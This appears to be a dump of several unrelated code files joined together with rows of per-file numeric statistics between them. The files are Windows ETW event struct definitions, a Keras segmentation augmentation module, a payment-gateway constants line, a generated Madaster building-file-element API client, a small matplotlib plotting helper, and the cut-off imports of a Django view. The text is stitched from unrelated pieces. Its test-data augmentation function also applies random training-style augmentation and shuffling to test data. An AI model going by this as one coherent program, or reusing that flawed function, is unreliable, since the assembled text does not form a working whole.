"fid_SizeOfEPDescriptor" / Int8ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=231, version=0)
class Microsoft_Windows_USB_MAUSBHOST_231_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul,
"fid_NumberOfEpHandlesToActivate" / Int8ul,
"fid_EndpointHandle" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=232, version=0)
class Microsoft_Windows_USB_MAUSBHOST_232_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
@declare(guid=guid("7725b5f9-1f2e-4e21-baeb-b2af4690bc87"), event_id=233, version=0)
class Microsoft_Windows_USB_MAUSBHOST_233_0(Etw):
pattern = Struct(
"fid_Controller" / Int64ul,
"fid_HeaderVersion" / Int8ul,
"fid_HeaderFlagBitHost" / Int8ul,
"fid_HeaderFlagBitRetry" / Int8ul,
"fid_HeaderFlagBitTimeStamp" / Int8ul,
"fid_HeaderSubType" / Int8ul,
"fid_HeaderType" / Int8ul,
"fid_HeaderLength" / Int16ul,
"fid_HeaderDeviceHandle" / Int16ul,
"fid_HeaderDeviceAddress" / Int8ul,
"fid_HeaderSSID" / Int8ul,
"fid_HeaderStatusCode" / Int8ul,
"fid_HeaderDialogToken" / Int16ul
)
| 34.411803
| 123
| 0.664267
| 5,239
| 53,063
| 6.423745
| 0.055163
| 0.096809
| 0.059844
| 0.088192
| 0.945148
| 0.94384
| 0.942771
| 0.812504
| 0.800351
| 0.800351
| 0
| 0.098835
| 0.225279
| 53,063
| 1,541
| 124
| 34.434134
| 0.719818
| 0.001847
| 0
| 0.716226
| 0
| 0
| 0.374443
| 0.203433
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003019
| 0
| 0.161509
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
287fcda2f713c086c51a5f2ed7352dbbd706cf82
| 1,646
|
py
|
Python
|
src/cr/vision/dl/aug/sgmt.py
|
indigits/indigits-vision
|
317fbf70c558e8f9563c3d0ba3bebbc5f84af622
|
[
"Apache-2.0"
] | 2
|
2021-11-02T10:09:47.000Z
|
2021-12-10T04:23:14.000Z
|
src/cr/vision/dl/aug/sgmt.py
|
indigits/indigits-vision
|
317fbf70c558e8f9563c3d0ba3bebbc5f84af622
|
[
"Apache-2.0"
] | null | null | null |
src/cr/vision/dl/aug/sgmt.py
|
indigits/indigits-vision
|
317fbf70c558e8f9563c3d0ba3bebbc5f84af622
|
[
"Apache-2.0"
] | null | null | null |
"""
Augmentation functions for image segmentation tasks
"""
from tensorflow.keras.preprocessing.image import ImageDataGenerator
def augment_train_2d(images, masks,
batch_size=32,
seed=0,
args=dict(
rotation_range=10.0,
height_shift_range=0.02,
shear_range=5,
horizontal_flip=True,
vertical_flip=False,
fill_mode="constant"
)):
image_datagen = ImageDataGenerator(**args)
mask_datagen = ImageDataGenerator(**args)
image_datagen.fit(images, augment=True, seed=seed)
mask_datagen.fit(masks, augment=True, seed=seed)
augmented_images = image_datagen.flow(
images, batch_size=batch_size, shuffle=True, seed=seed)
augmented_masks = mask_datagen.flow(
masks, batch_size=batch_size, shuffle=True, seed=seed)
generator = zip(augmented_images, augmented_masks)
return generator
def augment_test_2d(images, masks,
batch_size=32,
seed=0,
args=dict(
rotation_range=10.0,
height_shift_range=0.02,
shear_range=5,
horizontal_flip=True,
vertical_flip=False,
fill_mode="constant"
)):
image_datagen = ImageDataGenerator(**args)
mask_datagen = ImageDataGenerator(**args)
image_datagen.fit(images, augment=False, seed=seed)
mask_datagen.fit(masks, augment=False, seed=seed)
augmented_images = image_datagen.flow(
images, batch_size=batch_size, shuffle=True, seed=seed)
augmented_masks = mask_datagen.flow(
masks, batch_size=batch_size, shuffle=True, seed=seed)
generator = zip(augmented_images, augmented_masks)
return generator
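# Minimal usage sketch (hypothetical names: 'model', 'train_images' and 'train_masks'
# are not defined in this module). The zipped generator yields (image_batch, mask_batch)
# pairs indefinitely, so Keras needs an explicit steps_per_epoch:
# train_gen = augment_train_2d(train_images, train_masks, batch_size=32, seed=0)
# model.fit(train_gen, steps_per_epoch=len(train_images) // 32, epochs=20)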
| 32.92
| 67
| 0.696233
| 201
| 1,646
| 5.462687
| 0.253731
| 0.081967
| 0.065574
| 0.065574
| 0.859745
| 0.859745
| 0.859745
| 0.797814
| 0.797814
| 0.797814
| 0
| 0.016858
| 0.207169
| 1,646
| 49
| 68
| 33.591837
| 0.824521
| 0.030984
| 0
| 0.837209
| 0
| 0
| 0.010082
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.023256
| 0
| 0.116279
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
953d535574578989851c194699049aeb3db5a5d0
| 180
|
py
|
Python
|
donations/payment_gateways/_2c2p/constants.py
|
diffractive/newstream
|
cf1a1f230e18d01c63b50ab9d360aa44ac5a486f
|
[
"MIT"
] | 1
|
2020-05-03T12:33:42.000Z
|
2020-05-03T12:33:42.000Z
|
donations/payment_gateways/_2c2p/constants.py
|
diffractive/newstream
|
cf1a1f230e18d01c63b50ab9d360aa44ac5a486f
|
[
"MIT"
] | 14
|
2020-07-06T20:05:57.000Z
|
2022-03-12T00:39:11.000Z
|
donations/payment_gateways/_2c2p/constants.py
|
diffractive/newstream
|
cf1a1f230e18d01c63b50ab9d360aa44ac5a486f
|
[
"MIT"
] | null | null | null |
from site_settings.models import GATEWAY_CAN_EDIT_SUBSCRIPTION, GATEWAY_CAN_CANCEL_SUBSCRIPTION
API_CAPABILITIES = [GATEWAY_CAN_EDIT_SUBSCRIPTION, GATEWAY_CAN_CANCEL_SUBSCRIPTION]
| 60
| 95
| 0.916667
| 23
| 180
| 6.565217
| 0.521739
| 0.264901
| 0.18543
| 0.344371
| 0.715232
| 0.715232
| 0.715232
| 0.715232
| 0
| 0
| 0
| 0
| 0.05
| 180
| 3
| 96
| 60
| 0.883041
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
95ab9f0657f51d6270a63487802c65cb0dfef3d6
| 33,335
|
py
|
Python
|
python3/madasterapi/api/building_file_element_api.py
|
Madaster/examples
|
bd2e8e464172e0d47cac8ed1672501a24ba624c3
|
[
"MIT"
] | 2
|
2021-04-13T12:19:26.000Z
|
2021-09-13T15:40:44.000Z
|
python3/madasterapi/api/building_file_element_api.py
|
Madaster/examples
|
bd2e8e464172e0d47cac8ed1672501a24ba624c3
|
[
"MIT"
] | null | null | null |
python3/madasterapi/api/building_file_element_api.py
|
Madaster/examples
|
bd2e8e464172e0d47cac8ed1672501a24ba624c3
|
[
"MIT"
] | null | null | null |
"""
Madaster Private API - Build: 8815
Welcome to the **Madaster Private API** endpoint. This endpoint can be used to interact with the Madaster Platform and its resources. This API does not fully cover all functionality of the platform yet, please see below for the available functions and what they can be used for. For detailed information about the platform and this API, please refer to the [Madaster Documentation](https://docs.madaster.com) or the [Madaster API Documentation](https://docs.madaster.com/api).<br/><br/>To access these resources, you need an authorization token. If you do not have one yet, see the chapter about Authorization in the [API documentation](https://docs.madaster.com/api). This token should be sent as a header with the name 'X-API-Key', which will authenticate the request with the token. The documentation below specifies which requests are available and which responses they might produce.<br/><br/>This API can be reached at the endpoint: **[https://api.madaster.com/](https://api.madaster.com/)** # noqa: E501
The version of the OpenAPI document: v3.0
Contact: service@madaster.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from madasterapi.api_client import ApiClient, Endpoint as _Endpoint
from madasterapi.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from madasterapi.model.building_file_element_request import BuildingFileElementRequest
from madasterapi.model.building_file_element_response import BuildingFileElementResponse
from madasterapi.model.element_batch_result import ElementBatchResult
class BuildingFileElementApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __building_file_element_add_element(
self,
building_id,
file_id,
**kwargs
):
"""Create a new building file element # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.building_file_element_add_element(building_id, file_id, async_req=True)
>>> result = thread.get()
Args:
building_id (str): The building identifier
file_id (str): The file identifier
Keyword Args:
building_file_element_request (BuildingFileElementRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BuildingFileElementResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['building_id'] = \
building_id
kwargs['file_id'] = \
file_id
return self.call_with_http_info(**kwargs)
self.building_file_element_add_element = _Endpoint(
settings={
'response_type': (BuildingFileElementResponse,),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/api/v3.0/building/{buildingId}/files/{fileId}/elements',
'operation_id': 'building_file_element_add_element',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'building_id',
'file_id',
'building_file_element_request',
],
'required': [
'building_id',
'file_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'building_id':
(str,),
'file_id':
(str,),
'building_file_element_request':
(BuildingFileElementRequest,),
},
'attribute_map': {
'building_id': 'buildingId',
'file_id': 'fileId',
},
'location_map': {
'building_id': 'path',
'file_id': 'path',
'building_file_element_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'text/json',
'application/*+json'
]
},
api_client=api_client,
callable=__building_file_element_add_element
)
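# Usage sketch, mirroring the docstring above (identifiers are placeholders, not real
# Madaster resources; the ApiClient is assumed to carry a valid 'X-API-Key' header):
# api = BuildingFileElementApi()
# thread = api.building_file_element_add_element('building-guid', 'file-guid', async_req=True)
# response = thread.get()  # BuildingFileElementResponse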
def __building_file_element_delete_element(
self,
building_id,
file_id,
id,
**kwargs
):
"""Deletes an existing building file element # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.building_file_element_delete_element(building_id, file_id, id, async_req=True)
>>> result = thread.get()
Args:
building_id (str): The building identifier
file_id (str): The file identifier
id (str, none_type): The element identifier
Keyword Args:
_return_http_data_only (bool): return only the response data, without
    the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
    should be done on the data sent to the server.
    Default is True.
_check_return_type (bool): specifies if type checking
    should be done on the data received from the server.
    Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['building_id'] = \
building_id
kwargs['file_id'] = \
file_id
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.building_file_element_delete_element = _Endpoint(
settings={
'response_type': None,
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/api/v3.0/building/{buildingId}/files/{fileId}/elements/{id}',
'operation_id': 'building_file_element_delete_element',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'building_id',
'file_id',
'id',
],
'required': [
'building_id',
'file_id',
'id',
],
'nullable': [
'id',
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'building_id':
(str,),
'file_id':
(str,),
'id':
(str, none_type,),
},
'attribute_map': {
'building_id': 'buildingId',
'file_id': 'fileId',
'id': 'id',
},
'location_map': {
'building_id': 'path',
'file_id': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [],
},
api_client=api_client,
callable=__building_file_element_delete_element
)
def __building_file_element_get_element_by_id(
self,
building_id,
file_id,
id,
**kwargs
):
"""Gets a building file element # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.building_file_element_get_element_by_id(building_id, file_id, id, async_req=True)
>>> result = thread.get()
Args:
building_id (str): The building identifier
file_id (str): The file identifier
id (str, none_type): The element identifier
Keyword Args:
_return_http_data_only (bool): return only the response data, without
    the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
    should be done on the data sent to the server.
    Default is True.
_check_return_type (bool): specifies if type checking
    should be done on the data received from the server.
    Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BuildingFileElementResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['building_id'] = \
building_id
kwargs['file_id'] = \
file_id
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.building_file_element_get_element_by_id = _Endpoint(
settings={
'response_type': (BuildingFileElementResponse,),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/api/v3.0/building/{buildingId}/files/{fileId}/elements/{id}',
'operation_id': 'building_file_element_get_element_by_id',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'building_id',
'file_id',
'id',
],
'required': [
'building_id',
'file_id',
'id',
],
'nullable': [
'id',
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'building_id':
(str,),
'file_id':
(str,),
'id':
(str, none_type,),
},
'attribute_map': {
'building_id': 'buildingId',
'file_id': 'fileId',
'id': 'id',
},
'location_map': {
'building_id': 'path',
'file_id': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__building_file_element_get_element_by_id
)
def __building_file_element_get_elements(
self,
building_id,
file_id,
**kwargs
):
"""Gets a building file's elements # noqa: E501
This API is ODATA enabled, the following filters can be used: * $select * $filter * $skip * $top [READ MORE](https://developer.microsoft.com/en-us/graph/docs/concepts/query_parameters) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.building_file_element_get_elements(building_id, file_id, async_req=True)
>>> result = thread.get()
Args:
building_id (str): The building identifier
file_id (str): The file identifier
Keyword Args:
_return_http_data_only (bool): return only the response data, without
    the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
    should be done on the data sent to the server.
    Default is True.
_check_return_type (bool): specifies if type checking
    should be done on the data received from the server.
    Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[BuildingFileElementResponse]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['building_id'] = \
building_id
kwargs['file_id'] = \
file_id
return self.call_with_http_info(**kwargs)
self.building_file_element_get_elements = _Endpoint(
settings={
'response_type': ([BuildingFileElementResponse],),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/api/v3.0/building/{buildingId}/files/{fileId}/elements',
'operation_id': 'building_file_element_get_elements',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'building_id',
'file_id',
],
'required': [
'building_id',
'file_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'building_id':
(str,),
'file_id':
(str,),
},
'attribute_map': {
'building_id': 'buildingId',
'file_id': 'fileId',
},
'location_map': {
'building_id': 'path',
'file_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__building_file_element_get_elements
)
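        # Note on the endpoint above: its docstring advertises OData query
        # options ($select, $filter, $skip, $top), but the generated
        # params_map only maps building_id and file_id, so those options are
        # not exposed as named parameters here; passing them would rely on
        # whatever raw query-string mechanism the underlying api_client
        # provides (not shown in this file).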
def __building_file_element_update_element(
self,
building_id,
file_id,
id,
**kwargs
):
"""Updated an existing building file element # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.building_file_element_update_element(building_id, file_id, id, async_req=True)
>>> result = thread.get()
Args:
building_id (str): The building identifier
file_id (str): The file identifier
id (str, none_type): The element identifier
Keyword Args:
building_file_element_request (BuildingFileElementRequest): [optional]
_return_http_data_only (bool): return only the response data, without
    the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
    should be done on the data sent to the server.
    Default is True.
_check_return_type (bool): specifies if type checking
    should be done on the data received from the server.
    Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BuildingFileElementResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['building_id'] = \
building_id
kwargs['file_id'] = \
file_id
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.building_file_element_update_element = _Endpoint(
settings={
'response_type': (BuildingFileElementResponse,),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/api/v3.0/building/{buildingId}/files/{fileId}/elements/{id}',
'operation_id': 'building_file_element_update_element',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'building_id',
'file_id',
'id',
'building_file_element_request',
],
'required': [
'building_id',
'file_id',
'id',
],
'nullable': [
'id',
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'building_id':
(str,),
'file_id':
(str,),
'id':
(str, none_type,),
'building_file_element_request':
(BuildingFileElementRequest,),
},
'attribute_map': {
'building_id': 'buildingId',
'file_id': 'fileId',
'id': 'id',
},
'location_map': {
'building_id': 'path',
'file_id': 'path',
'id': 'path',
'building_file_element_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'text/json',
'application/*+json'
]
},
api_client=api_client,
callable=__building_file_element_update_element
)
def __building_file_element_upsert_elements(
self,
building_id,
file_id,
**kwargs
):
"""Batch: upsert (insert or update) multiple new building file elements (max 500) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.building_file_element_upsert_elements(building_id, file_id, async_req=True)
>>> result = thread.get()
Args:
building_id (str): The building identifier
file_id (str): The file identifier
Keyword Args:
building_file_element_request ([BuildingFileElementRequest], none_type): [optional]
_return_http_data_only (bool): return only the response data, without
    the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
    should be done on the data sent to the server.
    Default is True.
_check_return_type (bool): specifies if type checking
    should be done on the data received from the server.
    Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ElementBatchResult
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['building_id'] = \
building_id
kwargs['file_id'] = \
file_id
return self.call_with_http_info(**kwargs)
self.building_file_element_upsert_elements = _Endpoint(
settings={
'response_type': (ElementBatchResult,),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/api/v3.0/building/{buildingId}/files/{fileId}/elements/batch',
'operation_id': 'building_file_element_upsert_elements',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'building_id',
'file_id',
'building_file_element_request',
],
'required': [
'building_id',
'file_id',
],
'nullable': [
'building_file_element_request',
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'building_id':
(str,),
'file_id':
(str,),
'building_file_element_request':
([BuildingFileElementRequest], none_type,),
},
'attribute_map': {
'building_id': 'buildingId',
'file_id': 'fileId',
},
'location_map': {
'building_id': 'path',
'file_id': 'path',
'building_file_element_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'text/json',
'application/*+json'
]
},
api_client=api_client,
callable=__building_file_element_upsert_elements
)
| 38.360184
| 1,015
| 0.472806
| 2,902
| 33,335
| 5.159545
| 0.090627
| 0.040072
| 0.062179
| 0.025646
| 0.885127
| 0.855874
| 0.846791
| 0.829293
| 0.824618
| 0.824618
| 0
| 0.003241
| 0.444728
| 33,335
| 868
| 1,016
| 38.404378
| 0.805673
| 0.329384
| 0
| 0.728785
| 0
| 0
| 0.225821
| 0.062667
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011647
| false
| 0
| 0.011647
| 0
| 0.034942
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c2621adc77a959a20fb6e54a775c55dd7e138ca2
| 507
|
py
|
Python
|
src/visualization/visualize.py
|
afederation/RescueForcast
|
c3aac61c353428eb8a7f60bbb2b3bb3c67f5b70f
|
[
"MIT"
] | null | null | null |
src/visualization/visualize.py
|
afederation/RescueForcast
|
c3aac61c353428eb8a7f60bbb2b3bb3c67f5b70f
|
[
"MIT"
] | null | null | null |
src/visualization/visualize.py
|
afederation/RescueForcast
|
c3aac61c353428eb8a7f60bbb2b3bb3c67f5b70f
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
def missions_per_year(df):
'''
From a dataframe with the 'Year' column,
Plot a graph showing the number of missions per year
'''
missions_per_year = df.Year.value_counts()
plt.plot(missions_per_year.sort_index())
plt.show()
def missions_per_week(df):
    '''
    From a dataframe with a 'Week' column (assumed to be present),
    plot a graph showing the number of missions per week
    '''
    missions_per_week = df.Week.value_counts()
    plt.plot(missions_per_week.sort_index())
    plt.show()
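# Usage sketch (hypothetical): the helpers above expect a pandas DataFrame.
# The column names ('Year', 'Week') and the sample values below are
# illustrative only, not taken from the original project.
if __name__ == '__main__':
    import pandas as pd
    sample = pd.DataFrame({'Year': [2019, 2019, 2020, 2020, 2020],
                           'Week': [1, 2, 1, 1, 3]})
    missions_per_year(sample)
    missions_per_week(sample)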
| 25.35
| 56
| 0.678501
| 76
| 507
| 4.315789
| 0.302632
| 0.268293
| 0.320122
| 0.155488
| 0.890244
| 0.890244
| 0.890244
| 0.890244
| 0.890244
| 0.890244
| 0
| 0
| 0.218935
| 507
| 19
| 57
| 26.684211
| 0.828283
| 0.368836
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c28461c5045ef0eb2f2589aab30b86de5b481a4c
| 3,960
|
py
|
Python
|
src/revenue/views.py
|
janakparajuli/Survey_Office
|
1d5eb673eef67f923bf4c2b24156bea76f5fc32d
|
[
"Apache-2.0"
] | null | null | null |
src/revenue/views.py
|
janakparajuli/Survey_Office
|
1d5eb673eef67f923bf4c2b24156bea76f5fc32d
|
[
"Apache-2.0"
] | null | null | null |
src/revenue/views.py
|
janakparajuli/Survey_Office
|
1d5eb673eef67f923bf4c2b24156bea76f5fc32d
|
[
"Apache-2.0"
] | null | null | null |
from urllib import quote_plus
from django.contrib import messages
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.db.models import Q
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
# Create your views here.
from .tables import RevenueTable
from .models import Revenue
def revenue_list(request):
